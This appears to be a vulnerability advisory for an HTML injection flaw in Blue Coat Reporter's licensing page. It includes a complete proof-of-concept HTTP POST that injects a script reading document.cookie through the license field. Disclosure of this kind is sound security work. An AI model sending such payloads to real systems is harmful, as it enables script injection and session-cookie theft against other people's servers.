|
|
Blue Coat Reporter License HTML Injection Vulnerability
No exploit is required. The following proof of concept is available: POST /?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* Referer: http://www.example.com:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true Accept-Language: de Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.example.com:8987 Pragma: no-cache Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid Content-Length: 100 volatile.add_license=&volatile.license_to_add=<script>alert(document.cookie)</script> |
|
Privacy Statement |